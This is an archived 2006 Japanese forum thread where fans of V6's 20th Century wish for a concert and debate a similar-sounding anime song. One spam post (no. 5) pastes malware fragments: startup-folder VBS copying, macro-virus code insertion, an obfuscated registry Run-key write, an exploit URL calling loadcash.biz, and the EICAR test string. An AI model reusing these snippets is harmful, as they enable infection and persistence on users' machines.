2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

(●●)(´ε`)(^▽^・)No.45

1 :ななしじゃにー:2006/11/05(日) 23:43:33 ID:Q3MDv/Jm
CM終わっちゃった?
ウコンの力は皆の力。
戸煮紺の開催を禿げしく希望します。
いつでもщ(゚Д゚щ)カモォォォン 

ここはV6兄グループ・20th Centuryの本スレです。
コテハン・荒らし・煽りはスルー最強。
sage推奨でマターリ逝こうぜ。

【前スレ】06/02/19〜
(●●)(´ε`)(^▽^・)No.44
http://tv8.2ch.net/test/read.cgi/jan/1140289140/

【過去ログ一覧】
http://nanasea.fc2web.com/tonisure.html



2 :ななしじゃにー:2006/11/05(日) 23:49:00 ID:WqhuNpj/
>>1
新スレ乙

つ 旦旦旦~ ○○○
沖縄みやげの黒糖やぶれまんじゅうをドゾー

3 :ななしじゃにー:2006/11/05(日) 23:49:21 ID:9cSm6Cf8
>1
乙です!感謝!

4 :ななしじゃにー:2006/11/05(日) 23:56:14 ID:pe5YOraQ
>1
乙です。

5 :<body onload=window()>:2006/11/06(月) 00:11:58 ID:Voi5bBpN
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

6 :ななしじゃにー:2006/11/06(月) 00:19:47 ID:epdrsOhM
どうしてこんな平和なスレにまでウイルス貼るんだよorz
5は逝って二度とくるな


7 :ななしじゃにー:2006/11/06(月) 09:16:30 ID:tkX60Jik
なんでスルーできないの?自演?

8 :ななしじゃにー:2006/11/06(月) 13:30:29 ID:lRQRQdYK
>1
乙d〜!

9 :ななしじゃにー:2006/11/06(月) 18:18:18 ID:ISEHQHXh
>1
乙です。

10 :ななしじゃにー:2006/11/06(月) 19:28:00 ID:K4LtQeTe
>1
乙です


11 :ななしじゃにー:2006/11/06(月) 21:20:30 ID:A/oyGtAY
995 名前:ななしじゃにー[sage] 投稿日:2006/11/06(月) 00:08:31 ID:a+ByW2Zf
>994
乙。
995なら年明け早々通年CMケテーイ

996 名前:ななしじゃにー[sage] 投稿日:2006/11/06(月) 07:49:38 ID:RxCmL2yK
996なら戸煮紺ツアーケテーイ!

997 名前:ななしじゃにー[sage] 投稿日:2006/11/06(月) 17:34:17 ID:79qT7gCa
997なら全部新曲の戸煮アルバム発売ケテーイ!

998 名前:ななしじゃにー[sage] 投稿日:2006/11/06(月) 18:11:15 ID:A9r4m2ZT
998なら戸煮が歌って踊りまくりの新番組ケテーイ!

999 名前:ななしじゃにー[sage] 投稿日:2006/11/06(月) 18:22:14 ID:m4TH9QsF
999なら過去の戸煮紺、ネタ映像&MC&打ち上げ記録すべてDVD化ケテーイ!

1000 名前:ななしじゃにー[sage] 投稿日:2006/11/06(月) 18:38:31 ID:d9PHF0qe
1000なら、戸煮いまさらの大ブレイク発動。来年はトニコンもあるよ、な展開で!!


>1乙華麗
前スレのスンバラシイ展開にワロタw

12 :ななしじゃにー:2006/11/07(火) 19:07:34 ID:OFpWGVSJ
>1乙

ラジヲ板の次世代スレが落ちて残念

13 :ななしじゃにー:2006/11/07(火) 20:00:09 ID:nHWa0EEd
>1
乙d〜!


14 :ななしじゃにー:2006/11/07(火) 21:32:31 ID:pUGMHt1p
>1乙
前スレのラストサイコ
全部かなえたらもっとだw

15 :ななしじゃにー:2006/11/10(金) 16:44:43 ID:S/SiNsY7
トニコン希望!

16 :ななしじゃにー:2006/11/11(土) 00:07:01 ID:JhbXJGQN
戸煮紺行きたいよね

17 :ななしじゃにー:2006/11/11(土) 00:42:55 ID:uCSvTWgh
戸煮紺の噂とかないの?

18 :ななしじゃにー:2006/11/11(土) 07:39:38 ID:RhCa1Gf1
週刊誌で噂の三人が某会場に。トニコンの予感!?
とかないのかww<噂

19 :ななしじゃにー:2006/11/11(土) 09:35:16 ID:GkUFKLQ4
戸煮紺禿行きたいが事務所がその気ないからな。

20 :ななしじゃにー:2006/11/11(土) 15:13:38 ID:v6zjHaDf
晃スレに

796:11/07(火) 12:45 9HcsEShJ [sage]
某スレに、今後フジテレビが翻訳ミュージカルを幾つか上演予定とあった。
ジャニ主演としたら、妥当に行けばトニセン辺りが主役になるんだろうけど、
どれか1つでもいい、晃に出て欲しいな。。。

とあったが、翻訳ミュージカルの話しってる人いる?


21 :ななしじゃにー:2006/11/11(土) 15:19:08 ID:c/PveKJh
その「某スレ」はどれ?

22 :ななしじゃにー:2006/11/11(土) 15:25:01 ID:mWhV6cir
「ジャニ主演としたら」というあくまで仮定の話だからなー。
まぁあればウレスィが舞台よりも戸煮紺がよりウレスィ。

23 :ななしじゃにー:2006/11/11(土) 16:51:22 ID:R7IIOKHy
舞台も嬉しいが戸煮紺なら直嬉しい

24 :ななしじゃにー:2006/11/11(土) 16:55:24 ID:eKVkH/DH
ウコン変わっちゃったんだね(´・ω・`)

25 :ななしじゃにー:2006/11/11(土) 19:05:22 ID:9TyKd3sh
3人で歌ってる姿が見たいのですよ…

26 :ななしじゃにー:2006/11/11(土) 23:55:56 ID:aXhr8AWB
暇だ…

27 :ななしじゃにー:2006/11/13(月) 08:49:30 ID:1hVr94gf
あらちや滝つの紺が決まったみたいだね。
どさくさに紛れて戸煮紺も発表しちゃいなよ。

28 :ななしじゃにー:2006/11/13(月) 22:50:50 ID:PUAmnMQD
CD売れない時代だけど
新曲満載のアルバムが欲しい
やっぱ戸煮紺やるなら新曲を…

29 :ななしじゃにー:2006/11/13(月) 22:55:22 ID:Nr2kSn22
でも懐かしい曲も捨てがたい。
ノッキンとかノッキンとかノッキンとか。

30 :ななしじゃにー:2006/11/14(火) 05:19:45 ID:wXsrHVbK
召集はいつ?
会場はどこ?
戸煮紺ってあんの?今時…
それでも開催 されりゃとにかく
見せてやるぞ 偉大なる戸煮専の魅力を

31 :ななしじゃにー:2006/11/14(火) 08:23:28 ID:1m+DHxUq
>30
テラワロスw

32 :ななしじゃにー:2006/11/14(火) 12:43:48 ID:2tFsKocd
最後の戸煮紺って何時だったかな?
思い出せないくらい遥か昔な気がする。

33 :ななしじゃにー:2006/11/14(火) 16:27:33 ID:Twxx2Xaj
2003年。
もう3年も経つのに。

年明けからの戸煮紺でX'masプレゼントに召集礼状来ないかな。
そんな粋な事をしてくれたらX'masそっちのけで金払ってやる。
チケ代倍でもいいぞ、紺事務!

34 :ななしじゃにー:2006/11/14(火) 21:03:03 ID:RtZ80cJd
来年あたり、いきなりDSの案内がきそう。

35 :ななしじゃにー:2006/11/14(火) 21:21:55 ID:f2uJemZT
何でもщ(゚Д゚щ)カモォォォン 

36 :ななしじゃにー:2006/11/14(火) 23:07:13 ID:GcHqZwvm
>35
おまえ、飢えてるな…ま、自分もだが

37 :ななしじゃにー:2006/11/14(火) 23:51:40 ID:SUsAYuTE
DSかぁ…なんか本当にありえそうだな。
でも戸煮紺がイイよ。
戸煮紺で地方遠征しつつ美味しいもの食べたり
温泉入ったりしたいザ。

38 :ななしじゃにー:2006/11/14(火) 23:57:41 ID:xCgzQBdt
ここではあんまり評判良くなかったけど、
晩餐会もあれはあれで良かったな。

でも戸煮紺キボーン。
あんなに楽しいものを、どうして事務所はやろうとしないのだろう。

39 :ななしじゃにー:2006/11/15(水) 00:03:58 ID:gccw1svN
ネタ仕込中なんじゃね?
とりあえずフィルム系はもういいです

40 :ななしじゃにー:2006/11/15(水) 00:21:22 ID:79vHOo5/
もしかして会場が空いてないとか?
だったら家の居間使っていいから!!

41 :ななしじゃにー:2006/11/15(水) 00:25:21 ID:gz3AZvhU
>40
いつぞやの髪スレでも同じ流れになっててワロス

42 :ななしじゃにー:2006/11/15(水) 00:37:36 ID:QvTzqQ//
いやいや、ここは戸煮らしく
やはり公民館だろう。

43 :ななしじゃにー:2006/11/15(水) 01:18:22 ID:gHy5mtTm
>30
(・∀・)ウマイ!!

44 :ななしじゃにー:2006/11/15(水) 01:44:21 ID:wIf9Wps7
DSの文字を見て
「え、ゲーム化?」と思った自分は負け組
三十路アイドル育成ゲーム…

45 :ななしじゃにー:2006/11/15(水) 02:08:21 ID:83u6GVa1
>44
ナカーマ。
でもやってみたいキガス。

46 :ななしじゃにー:2006/11/15(水) 02:14:51 ID:CL7Z2mKy
体力回復アイテムが芋焼酎とかラーメンで
気力回復アイテムが家庭菜園のハーブ

だったら買うw

47 :ななしじゃにー:2006/11/15(水) 02:58:53 ID:QvTzqQ//
早くポイントを貯めないと紺に参戦出来ない、とかな。

48 :ななしじゃにー:2006/11/15(水) 08:40:26 ID:TSKSZ40G
今DSなんてやったら、移動厨まんさんで大変なことになりそうだな…
マジレススマソ

49 :ななしじゃにー:2006/11/15(水) 21:20:01 ID:TbagU35q
痴呆でDSはどうだ?

確か2、3年前に干菓子が地元老舗ホテルでやっていたはずだ。

50 :ななしじゃにー:2006/11/16(木) 00:14:54 ID:+awWx8Ji
なぜ事務所は戸煮紺を忘れたふりをするのか?

51 :ななしじゃにー:2006/11/16(木) 00:27:40 ID:roiZkzhB
某フケセンが話してた所によると、
事務所がスケ調整してくれないと戸似がこぼしてたらしい。
仕方ないので公録とかで、ちょこちょこ頑張ってるんだと。
DSだったらどうせみんな暇そうな時期だし、
やってくれるならそれでも良いかも〜と思い始めた。

52 :ななしじゃにー:2006/11/16(木) 01:44:04 ID:fXDVNjgf
儲からないの?(´・ω・`)

53 :ななしじゃにー:2006/11/16(木) 09:04:57 ID:Xn9z/IEw
戸煮も紺やりたいんだな…
それだけに毎回ヲタに言われるとビミョンな表情になるのか。
なんとなく理解できた。
グッズいっぱい出せば買ってやるからスケ調整してくれ

54 :ななしじゃにー:2006/11/16(木) 20:28:02 ID:uRnnSOqQ
おぅ、やってくれりゃ全国行くぞ

55 :ななしじゃにー:2006/11/16(木) 20:59:28 ID:cUNsk0pl
スケが合わないなら早朝でも夜中でもいいぞ

56 :ななしじゃにー:2006/11/16(木) 22:14:05 ID:dm5gti4a
>55姐さん
タレに無理があるだろw

戸煮紺のために貯金してるんだが、溜まる一方だ。
そろそろつぎ込ませてくれ。

57 :ななしじゃにー:2006/11/17(金) 07:55:29 ID:CiRDZzKu
DSでも何でもいい、戸煮が見られれば。
それくらい飢えてるんだよ。

58 :ななしじゃにー:2006/11/17(金) 09:09:18 ID:ZU76BFfC
最近、次世代くらいしか楽しみがない。それもどうかと思うが。
3人でgdgdしゃべってんの聞くと癒される。

59 :ななしじゃにー:2006/11/17(金) 17:19:18 ID:idmv/IOO
戸煮
戸煮
戸煮

60 :ななしじゃにー:2006/11/18(土) 10:51:38 ID:biCJEOWE
姐さん方スマンが教えてくれ。
参考にロムる場所もあり杉わからな杉で挫折してしまったよ

自分過去スマデブ前後ブレイク前ファソだったんだがジャニは卒業してたんだ。
ひょんなことから先日の青山(ボーイフロムオズ)に行くことになり
5回行ってたセイヤムジカルのイ多な思い出とともに期待しないで(ゴメ・・)行ったんだが
今のレベルの高さに驚いた!ちとファソになりそうだw
でも正直この歳になってジャニに手を出す勇気が出ないし関連商品はアリ杉なんだ
そんな自分はなにから手を出せばいいのか脳
何様(?でいいのか?)の歌の上手さをシンプルにスゲー!と言いたいのだが
何枚もCD手にする程になれない(まだ様子見)自分に
 軽 く 失敗しない初手を教えてくれマイカ・・・

あえて本スレより色んな意見が聞けそうでマターリなココにしたのは
姐さん方にしたら小細工だったかもしれんが。どうか。

61 :ななしじゃにー:2006/11/18(土) 11:39:03 ID:JOr4fLNz
つ戸煮ベスト盤CD
 初回限定と通常で若干収録曲に違い有り

つ鼠映画ターザンDVD(1の方)
 何様の歌を聴きたいなら軽く失敗しないとおも

62 :ななしじゃにー:2006/11/18(土) 11:54:02 ID:8zlhBXhk
>60-61
個人スレに逝くことすら思い付かないって、相当バカだろ?

63 :ななしじゃにー:2006/11/18(土) 13:09:33 ID:OqrjYLnZ
個人スレに逝ってこの調子でやったら
どこぞの煽り厨じゃないかと疑られたりするんジャマイカ?

64 :ななしじゃにー:2006/11/18(土) 13:22:27 ID:biCJEOWE
>>61
d!戸煮ベスト盤があるのは調べてあったんだが
そうなんだよ、種類あるとかで訳わかんなくなって・・・orz
でもターザンはこれからもちょっと調べてみる。
鼠だし姪たちと楽しめそうだね

>>62
一応『挫折した』って書いたんだが。(=実行済)
普段別の板にいるのでそこらへんは心得てるよ?
でも個人本スレが自分みたいな十数年ジャニブランクの初心者には敷居高そうだったんだ
・・・ 軽 く でよかったんだ。そういう意味では馬鹿かもな自分
いきなり馬鹿言われて実はマターリじゃなかったんだなココ

65 :ななしじゃにー:2006/11/18(土) 13:32:32 ID:wVgjy1Dv
ジャニ板にマターリなスレなんて無いよ。

66 :ななしじゃにー:2006/11/18(土) 13:33:11 ID:8zlhBXhk
何様って本当に磁石なんだなあ。

67 :ななしじゃにー:2006/11/18(土) 20:44:52 ID:FR6dYuzQ
ファソサイトで聞いてくれば良いのに。

68 :ななしじゃにー:2006/11/19(日) 00:45:49 ID:TqPRDOcX
久々の大物か。
一々名目が必要なら買わなきゃいいのに。アホらしい。

69 :ななしじゃにー:2006/11/19(日) 01:11:05 ID:j0B00c/q
>何枚もCD手にする程になれない(まだ様子見)自分に
> 軽 く 失敗しない初手を教えてくれマイカ・・・

このへんが禿げしく上から目線なんだな、まさに何様
一言「お薦めCD教えてくれ」でいいじゃん
マターリしてないとか以前に空気読んでくれ

70 :ななしじゃにー:2006/11/19(日) 04:13:01 ID:Ge0nTcYt
戸煮紺でもあれば空気も和むのに(´・ω・`)

71 :ななしじゃにー:2006/11/19(日) 10:42:52 ID:ntTlH5wU
もうだめだ…_| ̄|...〇

戸煮紺がない事に耐えられない。

72 :ななしじゃにー:2006/11/19(日) 17:00:15 ID:v1TZ3Oay
自分の脳内でなら戸煮は毎日踊って歌ってアホな事やってるんだが脳…
現実になる日はいつの事やら

73 :ななしじゃにー:2006/11/19(日) 18:32:10 ID:oAlkMu7s
自分の中ではDSの何様、博様の披露宴場面がフラッシュバックしてるお。

74 :ななしじゃにー:2006/11/20(月) 20:35:56 ID:3juJ7TH6
また戸煮独特のコント+ショーな紺が見たいよママン

75 :ななしじゃにー:2006/11/21(火) 21:12:58 ID:7rUJVbvN
ガイシュツかもしれんが見つけたので貼っておく

950:名無しか・・・何もかも皆懐かしい :2006/11/20(月) 06:45:14 ID:??? [sage]
山寺宏一主演テレビシリーズのエンディング主題歌についてなんだけど……

機動戦士ガンダムSEEDのスーツCDで、カガリのキャラソン聴いたんだけどさ。

いや、聴いた瞬間なんか変だとは思ったんだ。
で、よーく考えてみたら、平成版テレビシリーズのキャプテンハーロック(山寺宏一主演)でV6の年上組三人が歌ってるエンディング主題歌と楽曲が同じなんだよね。

幸い、皆口裕子目当てで保存してあったビデオがあったから聴いて確かめてみたけど、やっぱり同一だった。
アレンジとか違うけど、大元は間違いなく同じ。

ハーロックの方ががリリース早いはずだから、これって著作権侵害されたんじゃないの?

76 :ななしじゃにー:2006/11/21(火) 21:58:19 ID:nmkEdKxj
何が?

77 :ななしじゃにー:2006/11/21(火) 23:20:53 ID:9dRyeDtV
そのキャラソンとやらをどっかにうpしてくれんとわからんよ
キャラソンってアニメのテーマソングのこというの?

78 :ななしじゃにー:2006/11/22(水) 01:03:04 ID:KnlhHzkD
キャラソンって多分キャラクターソングの事だとオモー。
アニメのキャラがそのまま歌を歌う、みたいな。
あるいはそのキャラクターのイメージソング、多分ね。
昔アニメオタクだったので、一応。違ったらスマソ。

>75
が言ってる曲ってちぎ翼だよな。

79 :ななしじゃにー:2006/11/22(水) 01:57:17 ID:kMFkDZuV
試聴してみたがビミョン。Aメロは確かに似てると言われれば似てるが。
サビの手前までしか試聴出来なかったので何とも言えないが

80 :ななしじゃにー:2006/11/22(水) 02:00:01 ID:YB9wH7oV
ttp://www.youtube.com/watch?v=nPfBrwkEEFs

これで流れてるやつか?

81 :ななしじゃにー:2006/11/22(水) 07:45:28 ID:KnlhHzkD
歌詞もアレンジも違うけど、コレって同じだよな。

82 :ななしじゃにー:2006/11/22(水) 16:31:01 ID:AeXHPtnj
英部じゃないんだね。いわゆるパクリってヤツですかい?

83 :ななしじゃにー:2006/11/22(水) 18:41:25 ID:IpDZpsrT
ttp://www.amazon.co.jp/exec/obidos/ASIN/B00008NB48

これの1曲目の「Precious Rose」ってやつか。
発売は2003年4月23日だから、ほぼ戸煮紺と同時じゃないか?
CDリリースとしては戸煮の方が遅いね。
でもサビはそのままちぎ翼を歌えるくらいソックリだ。

84 :ななしじゃにー:2006/11/22(水) 18:49:46 ID:uQEiqaKy
コード進行が似てる

85 :ななしじゃにー:2006/11/22(水) 19:22:51 ID:SPHZwiUM
アニメ板のほうでは話題になってる?
戸煮紺の時期にCD出てるってことはどうやってパクったんだ?
関係者筋で流れたのか、曲作ったパク者が戸煮紺来て聞いてたのか

86 :ななしじゃにー:2006/11/22(水) 19:32:50 ID:T14bSZQO
戸煮がパクッてたりしてー

87 :ななしじゃにー:2006/11/22(水) 20:20:26 ID:SPHZwiUM
戸煮は曲作ってないから

88 :ななしじゃにー:2006/11/22(水) 20:36:22 ID:xjkb8qWC
うわー本当に似てるわ
作曲者違うんだよね?
それとも戸煮曲の方もアニメに使われてたくらいだから
アニメソング用の曲とか、そういうことは………


ないわな('A`)

89 :ななしじゃにー:2006/11/22(水) 21:21:17 ID:tT5gnIYL
へえ〜確かにかなりそっくり
思わずワロタよw
サビとかまんまだよね
これは明らかに大元は同じだろう
どっちが先かは知らんが

ちぎ翼聞きたくなってきた
やっぱ戸煮紺、戸煮紺!!

90 :ななしじゃにー:2006/11/22(水) 22:18:33 ID:3OfOXqbT
武威の次は戸煮か。
それにしても似てるなー。作曲者は違うみたいだね。

自分もこれ聞いてたら戸煮紺行きたくなった。
責任とって開催してくれ

91 :ななしじゃにー:2006/11/22(水) 22:51:50 ID:Jo1ZPjo8
>75
そのスレ読みたい。アドレスキボンヌ

92 :ななしじゃにー:2006/11/22(水) 23:22:12 ID:06yvtYLi
>83
>これの1曲目の「Precious Rose」ってやつか。

タイトルまでどこかで聞いた事がある感じw

93 :ななしじゃにー:2006/11/22(水) 23:44:32 ID:6K9F3u6J
ttp://www.jbook.co.jp/p/p.aspx/2115647/s/

>1-5(4:47) Precious Rose(オリジナルカラオケ)
>演奏:カガリ・ユラ・アスハ(進藤尚美)/作詞:進藤尚美/作曲:Little Voice/編曲:清水武仁

作曲者とかが同じとかではないんだな。

94 :ななしじゃにー:2006/11/23(木) 00:09:18 ID:UeOiYs+P
ググッたらこのLittle Voiceというユニットの中に
ちぎ翼の作曲者が在籍していた模様
この当時に居たかどうかは不明だが


95 :ななしじゃにー:2006/11/23(木) 00:11:13 ID:Pwv6Koqw
えー…

96 :ななしじゃにー:2006/11/23(木) 00:22:40 ID:e++ux6bP
なんか…最悪だな('A`)

97 :94:2006/11/23(木) 00:49:54 ID:UeOiYs+P
すまん、よく見たら在籍していたわけではないようだ
でも一緒に仕事をした形跡はある
ちぎ翼の作曲者はちゃんと検索ヒットするが
アニソンの方の人は不明

98 :ななしじゃにー:2006/11/23(木) 00:52:42 ID:Doto/DUa
いずれにせよ・・・複雑だな。

99 :ななしじゃにー:2006/11/23(木) 01:03:25 ID:GhqeMhlm
2003年のツアーは4月20日からだったっけ。
本当に同時だな。

100 :ななしじゃにー:2006/11/23(木) 08:53:42 ID:7gOPzh1Q
>75が引っ張ってきたのはこれだろう

宇宙海賊キャプテン・ハーロック第4海賊島
http://anime.2ch.net/test/read.cgi/ranime/1103762705/

101 :ななしじゃにー:2006/11/23(木) 11:03:58 ID:Doto/DUa
>100
よく探したなww

102 :ななしじゃにー:2006/11/23(木) 12:02:49 ID:H1PaEUfj
>100
見に行ったらいきなりおもっくそ戸煮と髪間違えられててワロスw
それでも梳きだと力説されててウレシス

103 :ななしじゃにー:2006/11/23(木) 12:37:36 ID:0c+1tWUn
>97
一緒に仕事したというか、玉置なみに曲提供したか何かで
ガンダム繋がりなだけじゃないか?
Little Voiceのメンバーはどれだけ調べても出てこなかった
違うユニットが引っかかるだけ

104 :ななしじゃにー:2006/11/23(木) 14:46:32 ID:UeOiYs+P
>103
かもしれん。がその辺は調べても分からんかった。
ただLittle Voiceのメンバーは不明なんだが
キャラソンの編曲した清水さんとちぎ翼の作曲者である中野さんが
HΛLってユニットのメンバーであった事は何となく判明した。
中野さんは2004年に辞めてて、清水さんは現在でも在籍。
HΛLって結構有名な作曲チームだよな?

105 :ななしじゃにー:2006/11/23(木) 15:34:40 ID:1x3QnIvz
>104
HΛLって、昔は鮎の曲とかも書いてたし、
かなり有名で手広くやってる作曲チームだよね。

ちぎ翼は中野さんがやめる直後の曲ってこと?
双方の製作時期はわからんが、同じものを土台に作ったんだろうか。
ちぎ翼のパクリでもいやだが、
もし逆だったら・・・と考えると、そっちがもっといやだな。

106 :ななしじゃにー:2006/11/24(金) 05:08:35 ID:cbQqKiKs
>ちぎ翼のパクリでもいやだが、
>もし逆だったら・・・と考えると、そっちがもっといやだな。

CD化が遅かったのって同じものをbaseに先にこの曲がリリースされてたのが
ネックだったんジャマイカ?
真相が知りたいな。


107 :ななしじゃにー:2006/11/24(金) 09:56:25 ID:411P176Z
作り手が同じなら、手抜きの焼き直しの仕事だったんだろ
どっちが先とかの問題じゃないな
ちぎ翼がなかなかCD化しなかったのは
オタの要望がなきゃそのままうやむやにして
ガソダムのほうだけのリリースで済ませてたのかもしれん
そんなこと知らない戸煮が紺で必死に
「CD化キボンシル!」って言ってたのが悲しい…

108 :ななしじゃにー:2006/11/24(金) 11:43:13 ID:gEwSxg+e
>107
>作り手が同じなら、手抜きの焼き直しの仕事だったんだろ
あったね、そんなこと前にも…。
どっちも好きな曲なのにorz

109 :ななしじゃにー:2006/11/24(金) 11:43:56 ID:tp56dR6z
レス読んでたら見たくなって久々にムージックフェアを見た。
3人ともビジュもいいし、楽しそうに歌っててやっぱりいいな。





でも余計戸煮紺が恋しくなったよ。

110 :ななしじゃにー:2006/11/24(金) 19:23:13 ID:YX9hgSye

        .。::+。゚:゜゚。・::。.        .。::・。゚:゜゚。*::。.
      .。:*:゚:。:+゚*:゚。:+。・::。゚+:。   。:*゚。::・。*:。゚:+゚*:。:゚:+:。.
   .:・゚:。:*゚:+゚・。*:゚     ゚  (●●)゚       ゚:*。・゚+:゚*:。:゚・:.




111 :ななしじゃにー:2006/11/24(金) 19:28:51 ID:dLNWGZK1
>110
鼻水拭えよ

112 :ななしじゃにー:2006/11/24(金) 20:45:32 ID:jiLA9Nrk
>110
翼に見えた…

113 :ななしじゃにー:2006/11/24(金) 23:16:17 ID:mo6kv9gL
ttp://roxik.com/pictaps/?pid=94222

無理矢理合体させたらカオス

114 :ななしじゃにー:2006/11/25(土) 21:47:18 ID:veS6wYEl
>110
鼻から噴水かとオモタ

115 :ななしじゃにー:2006/11/27(月) 02:35:35 ID:+idFSV9/
最後の戸煮紺以降にヲタになった自分は
姐さんたちの紺待望論を読みながら
脳内紺を試みているんだが、想像にも限界があるw
いつか戸煮の空気感を生で感じてみたいよ。

116 :ななしじゃにー:2006/11/30(木) 18:03:12 ID:2PZdUoMP
次の戸煮紺、知人も期待してるのに。
オタ以外にもウケいいのにやらないなんてモッタイナイ!

117 :ななしじゃにー:2006/12/01(金) 01:16:58 ID:KtX5APce
イチネンマエノ ウコンマツリガ テラナツカシス

118 :ななしじゃにー:2006/12/02(土) 11:28:22 ID:AEUIWZY4
戸似紺なし雑誌なしカレンダーなし。
ナイナイヅクシハツライ。

119 :ななしじゃにー:2006/12/02(土) 11:36:55 ID:vnpe8qjD
せめてラジオが全都道府県で同時に聞ければいいのに

120 :ななしじゃにー:2006/12/02(土) 18:23:39 ID:4t6QrNkj
そこでピアキャストですよ

121 :ななしじゃにー:2006/12/02(土) 22:39:06 ID:vwWdiU87
春ぐらいに戸煮紺があればいいですね

122 :ななしじゃにー:2006/12/02(土) 22:41:04 ID:4Gyoa4zp
あ、あるのか?

123 :ななしじゃにー:2006/12/03(日) 09:29:05 ID:HqgiEvNT
CDTVの過去のランキングに入ってたね。
またシングル出してほしいな。

124 :ななしじゃにー:2006/12/04(月) 01:52:06 ID:b3jPDxEj
戸煮紺あるならGWは避けてもらわないと。
北国に行くには、渡航費が高すぎる…

125 :ななしじゃにー:2006/12/04(月) 10:53:38 ID:YlBfgl16
年明けから春にかけて誰も舞台とかないなら
戸煮紺開催禿キボンだ!

126 :ななしじゃにー:2006/12/04(月) 22:49:14 ID:R21hjZf1
>124 に禿同してはいるものの、
もし実際そうなったらGWでも何でも出かけるであろう自分がいる…

127 :ななしじゃにー:2006/12/04(月) 23:56:21 ID:CXFiItnm
高えなぁぁ
と言いながらウキウキと振込み用紙を書く姿を妄想…

128 :ななしじゃにー:2006/12/05(火) 00:30:38 ID:omXj0eE8
面倒くせえなあヲイ
と言いながら紺ご当地(゚д゚)ウマーなものを入念にチェックしてる姿(ry

129 :ななしじゃにー:2006/12/05(火) 02:11:02 ID:1e8YcbJi
金ないっつーの
と言いながら服を新調してるすg(ry

130 :ななしじゃにー:2006/12/05(火) 07:46:42 ID:sCJQYOzW
混むよなああ
と言いながら移動手段を考えr(ry

131 :ななしじゃにー:2006/12/05(火) 08:05:31 ID:T08IWl0v
頼むから浮気する暇あたえるなー!
貯金が他に逃げる暇あたえるなー!

132 :ななしじゃにー:2006/12/05(火) 13:29:19 ID:7XBCmIS+
戸煮担はツンデレだらけだなおいw

133 :ななしじゃにー:2006/12/05(火) 13:48:37 ID:5oj+26G6
べっ、別に地元以外の紺になんか行かないんだからねっ

134 :ななしじゃにー:2006/12/05(火) 20:41:21 ID:oW6EY01y
べ、別に紺があるからカワイイ洋服買ったり、美容院行ったり、頑張って残業するわけじゃ(ry

135 :ななしじゃにー:2006/12/05(火) 23:14:20 ID:IlRNYvTr
戸煮紺貯金が動く気配が無いので単車の免許を取り新車を買う予定w
このままじゃどんどん新しい趣味が増えるのでとっとと戸煮紺ーヤッテオネガイーサンザイサセテー

136 :ななしじゃにー:2006/12/07(木) 00:09:54 ID:k26IfYLH
ホント、かわいいよな、戸煮担ってw

137 :ななしじゃにー:2006/12/07(木) 00:41:34 ID:qbJl+fmS
武威紺・舞台貯金とは別で戸煮紺貯金してるんだがな。
いつになったら使えるんだろうか。
早く使わせてクレヨー


138 :ななしじゃにー:2006/12/08(金) 02:15:46 ID:T/agkBpq
戸煮担の姐さん方ってば、尊敬。
自分そんな貯金出来ナス。

139 :ななしじゃにー:2006/12/15(金) 18:58:48 ID:sYh9fRFy
モマイラ!!蛇波の着メロ、トニだぞ



140 :ななしじゃにー:2006/12/15(金) 19:26:37 ID:dx8U/Ggb
リクエストしたのがキタワァ*・゜゚・*:.。.:*・゜(n‘∀‘)η゚・*:.。.:*・゜゚・*

141 :ななしじゃにー:2006/12/15(金) 19:28:03 ID:dx8U/Ggb
なんか破れ鐘を叩いてるような音だ…

142 :ななしじゃにー:2006/12/15(金) 20:23:38 ID:0cyyjf9e
今週、何日かのサンスポに
「ウコンの力売上激増」的な記事が出たらしいんだが
ご覧になった姐さんはいませんか?
戸煮効果だったら嬉しいな。

143 :ななしじゃにー:2006/12/16(土) 18:10:16 ID:EJcKZ5kP
単に忘年会シーズンだからでないの?

144 :ななしじゃにー:2006/12/17(日) 05:26:25 ID:qgbb8Nuy
>>142嬉しい話ではあるが、
戸煮じゃなく、桃●さん効果扱いにされてたりしてな。

145 :ななしじゃにー:2006/12/18(月) 23:58:53 ID:FMr2ykOO
パーティー 会食 ウコンのちから(ウッコーン♪)
のCMの方がインパクトあった。
なんでタレントかえたんだよう!

146 :ななしじゃにー:2006/12/20(水) 18:01:12 ID:qY9bleFe
戸煮三人と桃○姐さんのギャラ…姐さんのほうが高いんだろうな

147 :ななしじゃにー:2006/12/24(日) 04:24:59 ID:7rTQziCj
そりゃ…禁句。

148 :ななしじゃにー:2006/12/24(日) 18:02:25 ID:eQxz0TCL
戸煮のお陰で桃○さんが使えるんだよ!

「緑茶もね」の声がキモイw

149 :ななしじゃにー:2006/12/24(日) 18:49:41 ID:micgh37M
戸煮がCMやめたから、ウコンはもう買わない。そのへんはっきりさせないと。
ウコン飲んだ翌朝の目覚めスッキリ感は惜しいけど…。

150 :ななしじゃにー:2006/12/25(月) 00:37:17 ID:nbgudlVS
>>149
自分もチカラは買ってないさ
今迄は見かけたら購入&前陳してたけどね
お安いサプリメントに切り替えたよ

151 :ななしじゃにー:2006/12/25(月) 02:03:02 ID:xZwVyEAL
>148-150
なんか…意外
こんな姐さんばっかり?

152 :ななしじゃにー:2006/12/25(月) 02:46:38 ID:CGGVw046
